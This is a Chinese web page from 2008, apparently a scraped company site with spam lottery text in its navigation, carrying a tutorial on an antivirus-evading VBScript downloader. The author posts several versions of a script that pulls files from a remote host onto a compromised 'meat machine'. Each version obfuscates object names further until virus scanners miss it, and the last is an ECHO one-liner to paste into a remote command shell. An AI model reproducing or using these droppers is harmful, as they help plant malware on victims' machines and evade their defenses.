青海網站建設、網絡推廣最好的公司--您身邊的網站建設專家,馬上拿起電話,聯系我們:0971-8235355   
黑龙江11选5预测网 黑龙江11选5预测网 |  公司簡介 |  網站建設 |  網絡推廣 |  空間租用 |  域名注冊 |  企業郵局 |  網絡安全 |  網站編程 |  客服中心 |  聯系我們 |  人才招聘
 
西寧威勢最新網站制做案例展示
Lastest Project
 
西寧網站建設  
當前位置為:黑龙江11选5预测网 >> 腳本安全 >> 正文  
[原創]孤行一鬼的免殺DOWN.VBS下載腳本

文章來源: 黑龙江11选5预测网     發布時間:2008-11-11    瀏覽次數:10613    tags:down.vbs VBS下載腳本

        以前一直用網上下載的DOWN.VBS,可能是用的人太多的原因吧,好長時間沒有玩了,這次拿出來用的時候,盡然被 瑞星給掛了,所以自己花了幾分鐘時間,寫了一個,原代碼如下:

Set xml = CreateObject("Microsoft.XMLHTTP"):xml.Open "GET",//www.ymbxx.icu/tools/tools.rar,False:xml.Send:with CreateObject("ADODB.Stream") :.type=1:.open:.write xml.responseBody:.savetofile "c:\wins.exe",2:end with:set xml=Nothing
寫完后在線進行多種病毒軟件的掃描查殺,結果如下:


文件 d1.vbs 接收于 2008.11.07 15:40:55 (CET)
當前狀態: 正在讀取 ... 隊列中 等待中 掃描中 完成 未發現 停止

結果: 11/35 (31.43%)

依然有11個殺毒軟件會查殺,再來

上面的腳本運行后會從URL中下載文件,并保存到肉機的C:\WINS.EXE,用起來還要改名,使用不太順手,再改進一下
寫成函數,一次可下載多個文件的
function GetHttpFile(url)
    FileName=LCase(mid(url,InStrRev(url, "/")+1))
Set xml = CreateObject("Microsoft.XMLHTTP")
xml.Open "GET",url,False
xml.Send
with CreateObject("ADODB.Stream")
.type=1
.open
.write xml.responseBody
.savetofile ".\"&FileName,2
end with
set xml=Nothing
end function
GetHttpFile("//www.ymbxx.icu/tools/tools.rar")
GetHttpFile("//www.ymbxx.icu/images/logo.jpg")

嗯,文件成功下載,且文件名也被保持,不錯!
呵呵,再在線掃描一下,TNND,還有6款殺軟會殺,包括KBSJ,KBSJ這方面確實挺強悍的,瑞星早就查不出來了,呵呵
不怕,我再變,下面再給出一個免殺改進版
function GetHttpFile(url)
    dim m,s
m="Microsoft.XMLHTTP"
s="ADODB.Stream"
    FileName=LCase(mid(url,InStrRev(url, "/")+1))
Set xml = CreateObject(m)
xml.Open "GET",url,False
xml.Send
with CreateObject(s)
.type=1
.open
.write xml.responseBody
.savetofile ".\"&FileName,2
end with
set xml=Nothing
end function
GetHttpFile("//www.ymbxx.icu/tools/tools.rar")
GetHttpFile("//www.ymbxx.icu/images/logo.jpg")

還有兩款殺軟放不過,不過對付市面上的殺軟,已經是游刃有余了,再次變形,

function GetHttpFile(url)
    dim m,s
m="M_i_c_r_osoft.X_M_L_H_T_T_P"
s="A_D_O_D_B_._S_t_r_e_a_m"
    FileName=LCase(mid(url,InStrRev(url, "/")+1))
Set xml = CreateObject(m)
.......
end function
GetHttpFile(//www.ymbxx.icu/tools/tools.rar)
GetHttpFile("//www.ymbxx.icu/images/logo.jpg")

OK,在線掃描后發現逃過所有的殺毒軟件,KBSJ也低頭了,嘿嘿,爽,為了使用方便,我再給出一個ECHO版的,這樣我們在CMDSHELL中直接粘,貼就可以使用了,方便
ECHO版的如下:

以下是引用片段:
ECHO function GetHttpFile(url):dim m,s:m="M_i_c_r_osoft.X_M_L_H_T_T_P":s="A_D_O_D_B_._S_t_r_e_a_m":FileName=LCase(mid(url,InStrRev(url, "/")+1)):Set xml = CreateObject(replace(m,"_","")):xml.Open "GET",url,False:xml.Send:with CreateObject(replace(s,"_","")):.type=1:.open:.write xml.responseBody:.savetofile ".\"^&FileName,2:end with:set xml=Nothing:end function:GetHttpFile("//www.ymbxx.icu/tools/tools.rar"):GetHttpFile("//www.ymbxx.icu/images/logo.jpg")> DOWN.VBS


注意ECHO版的直接用記事本打開,沒有任何換行,BS了所有的殺毒軟件,OK,拿去玩吧!上面的腳本中,多個下載之間用":"分開就行了,一起可以下載N多個文件。

另外,網上還找到一個使用更方面的,不過逃不過殺軟件的查殺,我直接給免我免殺過的吧[在線搜索發現瑞星還會查殺,但是其它殺軟都不會有反應了,瑞星的免殺起來也很簡單,我就不花時間了,大家自己搞定吧!]

以下是引用片段:
URL = LCase(WScript.Arguments(0))
dim m,s
m="M^i^c^r^o^s^o^f^t^.^X^M^L^H^T^T^P"
s="A=D=O=DB=.=S=t=r=e=a=m"
set cmd =Createobject(replace(m,"^",""))
cmd.Open "GET",URL,0
cmd.Send()
FileName=LCase(mid(URL,InStrRev(URL, "/")+1))
Set CsCriptGet = Createobject(replace(s,"=",""))
CsCriptGet.Mode = 3
CsCriptGet.Type = 1
CsCriptGet.Open()
CsCriptGet.Write(cmd.responseBody)
CsCriptGet.SaveToFile FileName,2


上一篇:[原創]孤行一鬼教你怎么樣防注入
下一篇:cookies防注入
評論列表
正在加載評論……
  
評論   
呢  稱:
驗證碼: 若看不清請點擊更換!
內  容:
 
 
  在線洽談咨詢:
點擊這里,在線洽談   點擊這里,在線洽談   點擊這里,在線洽談
與我交談  與我交談 與我交談
乘車路線    匯款方式   加盟合作  人才招聘  
公司地址:青海省西寧市西關大街73號(三二四部隊招行所四樓)     青ICP備13000578號-1 公安機關備案號:63010402000123    
QQ:147399120    mail:[email protected]    電話: 13897410341    郵編:810000
© Copyright( 2008-2009) www.ymbxx.icu All Rights Reserved    版權所有:西寧威勢電子信息服務有限公司 未經書面制授權,請勿隨意轉載!
業務:青海網站制做、青海網站建設、青海網頁設計、西寧網站制做、西寧網站建設、青海域名注冊、青海網絡推廣、青海網站推廣、青??占渥庥?/a>、黑龙江11选5预测网、黑龙江11选5预测网、網絡安全